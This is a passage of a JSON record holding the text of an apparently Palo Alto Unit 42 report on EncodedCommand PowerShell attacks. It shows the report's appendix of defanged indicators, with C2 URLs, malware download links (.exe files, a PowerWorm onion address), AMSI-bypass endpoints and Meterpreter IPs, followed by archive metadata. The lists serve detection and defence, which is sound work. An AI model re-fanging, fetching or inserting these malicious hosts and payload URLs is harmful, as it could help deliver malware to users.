hxxps://104[.]131.182.177:443/index.asp\r\n1 hxxp://sparta34[.]no-ip.biz:443/index.asp\r\n1 hxxp://securetx[.]ddns.net:3333/index.asp\r\n1 hxxp://pie32[.]mooo.com:8080/index.asp\r\n1 hxxp://m[.]jdirving.email:21/index.asp\r\n1 hxxp://kooks[.]ddns.net:4444:4444/index.asp\r\n1 hxxp://kernel32[.]ddns.net:8080/index.asp\r\n1 hxxp://home[.]rzepka.se/index.asp\r\n1 hxxp://192.ho4x.com:80/index.asp\r\n1 hxxp://ec2-35-167-185-55[.]us-west-2.compute.amazonaws.com:443/index.asp\r\n1 hxxp://amazonsdeliveries[.]com/index.asp\r\n1 hxxp://ahyses[.]ddns.net:4444/index.asp\r\n1 hxxp://98[.]103.103.170:80/index.asp\r\n1 hxxp://98[.]103.103.168:80/index.asp\r\n1 hxxp://93[.]187.43.200:80/index.asp\r\n1 hxxp://84[.]200.2.13:8080/index.asp\r\n1 hxxp://78[.]229.133.134:80/index.asp\r\n1 hxxp://68[.]66.9.76/index.asp\r\n1 hxxp://52[.]36.245.145:8080/index.asp\r\n1 hxxp://52[.]28.250.99:8080/index.asp\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 31 of 35\n\n75\r\n76\r\n77\r\n78\r\n79\r\n80\r\n81\r\n82\r\n83\r\n84\r\n85\r\n86\r\n87\r\n88\r\n89\r\n90\r\n91\r\n92\r\n93\r\n94\r\n95\r\n96\r\n97\r\n98\r\n99\r\n100\r\n101\r\n102\r\n103\r\n104\r\n105\r\n106\r\n107\r\n1 hxxp://52[.]196.119.113:80/index.asp\r\n1 hxxp://50[.]251.57.67:8080/index.asp\r\n1 hxxp://47[.]88.17.109:80/index.asp\r\n1 hxxp://46[.]246.87.205/index.asp\r\n1 hxxp://41[.]230.232.65:5552:5552/index.asp\r\n1 hxxp://24[.]111.1.135:22/index.asp\r\n1 hxxp://23[.]116.90.9:80/index.asp\r\n1 hxxp://222[.]230.139.166:80/index.asp\r\n1 hxxp://197[.]85.191.186:80/index.asp\r\n1 hxxp://197[.]85.191.186:443/index.asp\r\n1 hxxp://192[.]241.129.69:443/index.asp\r\n1 hxxp://191[.]101.31.118:8081/index.asp\r\n1 hxxp://187[.]228.46.144:8888/index.asp\r\n1 hxxp://187[.]177.151.80:12345/index.asp\r\n1 hxxp://166[.]78.124.106:80/index.asp\r\n1 hxxp://163[.]172.151.90:80/index.asp\r\n1 hxxp://149[.]56.178.124:8080/index.asp\r\n1 hxxp://139[.]59.12.202:80/index.asp\r\n1 hxxp://138[.]121.170.12:500/index.asp\r\n1 hxxp://138[.]121.170.12:3138/index.asp\r\n1 hxxp://138[.]121.170.12:3137/index.asp\r\n1 hxxp://138[.]121.170.12:3136/index.asp\r\n1 hxxp://138[.]121.170.12:3135/index.asp\r\n1 hxxp://138[.]121.170.12:3133/index.asp\r\n1 hxxp://138[.]121.170.12:3031/index.asp\r\n1 hxxp://137[.]117.188.120:443/index.asp\r\n1 hxxp://11[.]79.40.53:80/index.asp\r\n1 hxxp://108[.]61.217.22:443/index.asp\r\n1 hxxp://104[.]233.102.23:8080/index.asp\r\n1 hxxp://104[.]145.225.3:8081/index.asp\r\n1 hxxp://104[.]131.154.119:8080/index.asp\r\n1 hxxp://104[.]130.51.215:80/index.asp\r\n1 hxxp://100[.]100.100.100:8080/index.asp\r\nDownloader DFSP 2X\r\n25 hxxp://93[.]174.94.135/~kali/ketty.exe\r\n19 hxxp://94[.]102.52.13/~yahoo/stchost.exe\r\n17 hxxp://93[.]174.94.137/~rama/jusched.exe\r\n17 hxxp://94[.]102.52.13/~harvy/scvhost.exe\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 32 of 35\n\n2 hxxp://10[.]10.01.10/bahoo/stchost.exe\r\n1 hxxp://93[.]174.94.135/~harvy/verfgt.exe\r\nDownloader DFSP DPL\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n2 hxxp://198[.]50.137.173/a.exe\r\n2 hxxp://201[.]130.72.171/andac.exe\r\n2 hxxp://worldnit[.]com/miracle.exe\r\n2 hxxp://www[.]amspeconline.com/123/nana.exe\r\n1 hxxp://198[.]50.137.173/b.exe\r\n1 hxxp://31[.]184.234.74/crypted/1080qw.exe\r\n1 hxxp://alonqood[.]com/abacom.exe\r\n1 hxxp://alonqood[.]com/ezeke.exe\r\n1 hxxp://alonqood[.]com/lumia.exe\r\n1 hxxp://alonqood[.]com/nano.exe\r\n1 hxxp://alonqood[.]com/obi.exe\r\n1 hxxp://snthostings[.]com/billing//includes/db/dannyfinal.exe\r\n1 hxxp://worldnit[.]com/abu.exe\r\n1 hxxp://worldnit[.]com/guyo.exe\r\n1 hxxp://worldnit[.]com/vc.exe\r\n1 hxxp://www[.]amspeconline.com/123/nach.exe\r\n1 hxxp://www[.]amspeconline.com/123/nazy.exe\r\n1 hxxp://www[.]macwizinfo.com/zap/manage/may2.exe\r\n1 hxxps://a[.]pomf.cat/bvudaf.exe\r\n1 hxxps://a[.]pomf.cat/qebhhu.exe\r\nDownloader IEXDS\r\n6 hxxp://84[.]200.84.187/Google Update Check.html\r\n2 hxxp://52[.]183.79.94:80/TYBMkTfsQ\r\n2 hxxp://76[.]74.127.38/default-nco.html\r\n2 hxxp://pmlabs[.]net/cis/test.jpg\r\n2 hxxps://wowyy[.]ga/counter.php?c=pdfxpl+\r\n1 hxxp://192[.]168.137.241:8080/\r\n1 hxxp://91[.]120.23.152/wizz.txt\r\n1 hxxp://93[.]171.205.35:8080/\r\n1 hxxp://cannot[.]loginto.me/googlehelper.ps1\r\n1 hxxps://invesco[.]online/aaa\r\nBITSTransfer\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 33 of 35\n\n11 hxxp://94[.]102.50.39/keyt.exe\r\nTXT C2\r\n4 l[.]ns.topbrains.pl\r\n2 p[.]s.os.ns.rankingplac.pl\r\n1 l[.]ns.huawel.ro\r\n1 p[.]s.pn.ns.sse.net.pl\r\n1 p[.]s.rk.ns.rankingplac.pl\r\n1 p[.]s.w2.ns.rankingplac.pl\r\nDownloader Proxy\r\n7 hxxp://54[.]213.195.138/s2.txt?u=\r\n1 hxxp://www[.]bcbs-arizona.org/s2.txt?u=\r\n1 hxxp://www[.]bcbsarizona.org/s2.txt?u=\r\nDownloader Kraken\r\n5 hxxp://kulup[.]isikun.edu.tr/Kraken.jpg\r\nPowerWorm\r\n12 hxxp://powerwormjqj42hu[.]onion/get.php?s=setup\u0026amp;mom=\r\n7 hxxp://powerwormjqj42hu[.]onion/get.php?s=setup\u0026amp;uid=\r\nAMSI Bypass\r\n4 hxxp://35[.]165.38.15:80/login/process.php\r\n1 hxxp://amazonsdeliveries[.]com:80/account/login.php\r\n1 hxxp://35[.]164.97.4:80/admin/get.php\r\n1 hxxp://162[.]253.133.189:443/login/process.php\r\n1 hxxp://162[.]253.133.189:443/admin/get.php\r\nMeterpreter RHTTP\r\n1 198[.]56.248.117\r\n1 62[.]109.8.21\r\n1 65[.]112.221.34\r\n1 88[.]160.254.183\r\nLayers of Obfuscation\r\n1 hxxp://ec2-35-167-185-55[.]us-west-2.compute.amazonaws.com:8080/anSfrf\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 34 of 35\n\nSHA1 Hashtag\r\n1 hxxp://212[.]83.186.207/?i=\r\nAdditional hashes to samples can be found here.\r\nSource: https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 35 of 35",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/"
	],
	"report_names": [
		"unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks"
	],
	"threat_actors": [],
	"ts_created_at": 1775434538,
	"ts_updated_at": 1775791216,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c5f50fa4f8e7ea98d131b935b5f7b6677147d975.pdf",
		"text": "https://archive.orkl.eu/c5f50fa4f8e7ea98d131b935b5f7b6677147d975.txt",
		"img": "https://archive.orkl.eu/c5f50fa4f8e7ea98d131b935b5f7b6677147d975.jpg"
	}
}